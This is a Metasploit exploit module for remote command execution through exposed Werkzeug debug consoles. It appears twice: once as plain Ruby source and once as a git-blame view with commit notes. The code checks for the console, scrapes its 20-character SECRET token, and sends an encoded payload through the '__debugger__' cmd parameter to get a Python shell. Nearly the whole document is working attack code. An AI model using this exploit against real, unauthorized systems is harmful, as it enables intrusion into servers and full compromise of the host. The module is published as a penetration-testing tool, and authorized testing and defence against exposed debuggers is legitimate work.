metasploit-framework/modules/exploits/multi/http/werkzeug_debug_rce.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  def initialize
    super(
      'Name'        => 'Werkzeug Debug Shell Command Execution',
      'Description' => %q{
        This module will exploit the Werkzeug debug console to put down a
        python shell.  This debugger "must never be used on production
        machines", but sometimes slips passed testing.
        Tested against:
            0.9.6 on Debian
            0.9.6 on Centos
            0.10  on Debian
      },
      'Author'      => 'h00die <mike[at]shorebreaksecurity.com>',
      'References'  =>
          [
            [ 'URL', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger']
          ],
      'License'     => MSF_LICENSE,
      'Platform'       => ['python'],
      'Targets'        => [[ 'werkzeug 0.10 and older', {}]],
      'Arch'           => ARCH_PYTHON,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 28 2015',
    )
    register_options(
      [
        OptString.new('TARGETURI', [true, 'URI to the console', '/console'])
      ], self.class
    )
  end

  def check
    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => normalize_uri(datastore['TARGETURI'])
    )
    # https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67
    if res && res.body =~ /Werkzeug powered traceback interpreter/
      return Exploit::CheckCode::Appears
    end
    Exploit::CheckCode::Safe
  end

  def exploit
    # first we need to get the SECRET code
    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => normalize_uri(datastore['TARGETURI'])
    )
    if res && res.body && res.body.to_s =~ /SECRET = "([a-zA-Z0-9]{20})";/
      secret = $1
      vprint_status("Secret Code: #{secret}")
      send_request_cgi(
        'method'   => 'GET',
        'uri'      => normalize_uri(datastore['TARGETURI']),
        'vars_get' => {
          '__debugger__' => 'yes',
          'cmd' => payload.encoded,
          'frm' => '0',
          's' => secret
        }
      )
    else
      print_error('Secret code not detected.')
    end
  end
end
Initial add 2015-07-11 01:13:12 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`
			`require 'rex'`

			`class Metasploit4 < Msf::Exploit::Remote`
			`Rank = ExcellentRanking`
			`include Msf::Exploit::Remote::HttpClient`

			`def initialize`
			`super(`
			`'Name' => 'Werkzeug Debug Shell Command Execution',`
			`'Description' => %q{`
			`This module will exploit the Werkzeug debug console to put down a`
			`python shell. This debugger "must never be used on production`
			`machines", but sometimes slips passed testing.`
			`Tested against:`
			`0.9.6 on Debian`
updated per feedback from PR 2015-07-12 01:03:02 +00:00			`0.9.6 on Centos`
			`0.10 on Debian`
Initial add 2015-07-11 01:13:12 +00:00			`},`
			`'Author' => 'h00die <mike[at]shorebreaksecurity.com>',`
			`'References' =>`
			`[`
updates per @jvazquez-r7 comments 2015-07-25 00:34:40 +00:00			`[ 'URL', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger']`
Initial add 2015-07-11 01:13:12 +00:00			`],`
			`'License' => MSF_LICENSE,`
			`'Platform' => ['python'],`
thanks @espreto for help 2015-08-01 15:11:37 +00:00			`'Targets' => [[ 'werkzeug 0.10 and older', {}]],`
Initial add 2015-07-11 01:13:12 +00:00			`'Arch' => ARCH_PYTHON,`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Jun 28 2015',`
			`)`
			`register_options(`
			`[`
thanks @espreto for help 2015-08-01 15:11:37 +00:00			`OptString.new('TARGETURI', [true, 'URI to the console', '/console'])`
Initial add 2015-07-11 01:13:12 +00:00			`], self.class`
			`)`
			`end`

			`def check`
thanks @espreto for help 2015-08-01 15:11:37 +00:00			`res = send_request_cgi(`
			`'method' => 'GET',`
			`'uri' => normalize_uri(datastore['TARGETURI'])`
			`)`
			`# https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67`
			`if res && res.body =~ /Werkzeug powered traceback interpreter/`
updates per @jvazquez-r7 comments 2015-07-25 00:34:40 +00:00			`return Exploit::CheckCode::Appears`
Initial add 2015-07-11 01:13:12 +00:00			`end`
thanks @espreto for help 2015-08-01 15:11:37 +00:00			`Exploit::CheckCode::Safe`
Initial add 2015-07-11 01:13:12 +00:00			`end`

			`def exploit`
thanks @espreto for help 2015-08-01 15:11:37 +00:00			`# first we need to get the SECRET code`
			`res = send_request_cgi(`
			`'method' => 'GET',`
			`'uri' => normalize_uri(datastore['TARGETURI'])`
			`)`
updates per @jvazquez-r7 comments 2015-07-25 00:34:40 +00:00			`if res && res.body && res.body.to_s =~ /SECRET = "([a-zA-Z0-9]{20})";/`
			`secret = $1`
interpolation fix on secret 2015-08-01 18:39:12 +00:00			`vprint_status("Secret Code: #{secret}")`
thanks @espreto for help 2015-08-01 15:11:37 +00:00			`send_request_cgi(`
			`'method' => 'GET',`
			`'uri' => normalize_uri(datastore['TARGETURI']),`
			`'vars_get' => {`
			`'__debugger__' => 'yes',`
			`'cmd' => payload.encoded,`
			`'frm' => '0',`
			`'s' => secret`
			`}`
			`)`
Initial add 2015-07-11 01:13:12 +00:00			`else`
thanks @espreto for help 2015-08-01 15:11:37 +00:00			`print_error('Secret code not detected.')`
Initial add 2015-07-11 01:13:12 +00:00			`end`
			`end`
			`end`